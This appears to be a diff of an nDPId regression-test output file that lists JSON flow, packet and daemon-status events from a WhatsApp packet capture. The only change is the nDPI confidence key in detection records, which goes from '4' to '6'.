00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1655079015860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655079015860,"pkt":"eJS0JASgYDjgxTWgCABFAAA8+71AAD8GBoTAqAJkszzDMbawFGbU0lPTAAAAAKAC\/\/+CegAAAgQFtAQCCArHFtE1AAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1655079015890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655079015890,"pkt":"eJS0JASgYDjgxTWgCABFAAA0+75AAD8GBovAqAJkszzDMbawFGbU0lPU4I1M54AQAKyMuwAAAQEICscW0VNPFaco"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1655079015897,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655079015897,"pkt":"eJS0JASgYDjgxTWgCABFAAA4+79AAD8GBobAqAJkszzDMbawFGbU0lPU4I1M54AYAKxHYwAAAQEICscW0VpPFacoRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655079015860,"flow_last_seen":1655079015927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655079015927,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46768,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655071203961,"flow_last_seen":1655071204088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":55038,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655071204543,"flow_last_seen":1655071205708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.70.50","src_port":55476,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655071168997,"flow_last_seen":1655071169315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655079015860,"flow_last_seen":1655079015927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655079015927,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46768,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655071203961,"flow_last_seen":1655071204088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":55038,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655071204543,"flow_last_seen":1655071205708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.70.50","src_port":55476,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655071168997,"flow_last_seen":1655071169315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655079016137,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655079242727,"flow_last_seen":1655079242727,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655079242727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45130,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1655079242727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655079242727,"pkt":"eJS0JASgYDjgxTWgCABFAAA81XtAAD8GLNbAqAJkszzDIbBKFGYSKeedAAAAAKAC\/\/8NrgAAAgQFtAQCCAoGazwDAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1655079242758,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655079242758,"pkt":"eJS0JASgYDjgxTWgCABFAAA01XxAAD8GLN3AqAJkszzDIbBKFGYSKeee9mtN3YAQAKzI+QAAAQEICgZrPCF7C7NT"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1655079242759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655079242759,"pkt":"eJS0JASgYDjgxTWgCABFAAA41X1AAD8GLNjAqAJkszzDIbBKFGYSKeee9mtN3YAYAKyDpgAAAQEICgZrPCN7C7NTRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655079242727,"flow_last_seen":1655079242760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655079242760,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45130,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655079242727,"flow_last_seen":1655079242760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655079242760,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45130,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":458,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":458,"packets-processed":457,"total-skipped-flows":0,"total-l4-payload-len":37951,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":58,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":58,"total-idle-flows":47,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":379,"global_ts_msec":1655085444940} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655085444940,"flow_last_seen":1655085444940,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655085444940,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":60328,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1655085444940,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655085444940,"pkt":"eJS0JASgYDjgxTWgCABFAAA8OS9AAD8GyRLAqAJkszzDMeuoFGZwsQ0oAAAAAKAC\/\/8MiAAAAgQFtAQCCApJMzrhAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1655085444971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655085444971,"pkt":"eJS0JASgYDjgxTWgCABFAAA0OTBAAD8GyRnAqAJkszzDMeuoFGZwsQ0pZQWH8YAQAVeTjwAAAQEICkkzOwA0eITQ"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1655085445085,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655085445085,"pkt":"eJS0JASgYDjgxTWgCABFAAA4OTFAAD8GyRTAqAJkszzDMeuoFGZwsQ0pZQWH8YAYAVdNzAAAAQEICkkzO3I0eITQRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655085444940,"flow_last_seen":1655085445116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655085445116,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":60328,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074455881,"flow_last_seen":1655074456133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42622,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655075014427,"flow_last_seen":1655075014609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42796,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655075686356,"flow_last_seen":1655075686549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074111508,"flow_last_seen":1655074111844,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45850,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074681295,"flow_last_seen":1655074681757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58198,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655073402411,"flow_last_seen":1655073402833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48538,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655085444940,"flow_last_seen":1655085445116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655085445116,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":60328,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074455881,"flow_last_seen":1655074456133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42622,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655075014427,"flow_last_seen":1655075014609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42796,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655075686356,"flow_last_seen":1655075686549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074111508,"flow_last_seen":1655074111844,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45850,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074681295,"flow_last_seen":1655074681757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58198,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655073402411,"flow_last_seen":1655073402833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48538,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":466,"packets-processed":465,"total-skipped-flows":0,"total-l4-payload-len":38268,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":59,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":59,"total-idle-flows":53,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":391,"global_ts_msec":1655089030478} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655089030478,"flow_last_seen":1655089030478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655089030478,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":32798,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1655089030478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655089030478,"pkt":"eJS0JASgYDjgxTWgCABFAAA8PU5AAD8GxPPAqAJkszzDMYAeFGbXqdzGAAAAAKAC\/\/+LPgAAAgQFtAQCCApJafDnAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1655089030510,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655089030510,"pkt":"eJS0JASgYDjgxTWgCABFAAA0PU9AAD8GxPrAqAJkszzDMYAeFGbXqdzHU7KHPoAQAVeFmQAAAQEICklp8QcyIyXX"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1655089030611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655089030611,"pkt":"eJS0JASgYDjgxTWgCABFAAA4PVBAAD8GxPXAqAJkszzDMYAeFGbXqdzHU7KHPoAYAVc\/4gAAAQEICklp8W0yIyXXRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655089030478,"flow_last_seen":1655089030643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655089030643,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":32798,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655078415178,"flow_last_seen":1655078415507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46732,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655079015860,"flow_last_seen":1655079016137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46768,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 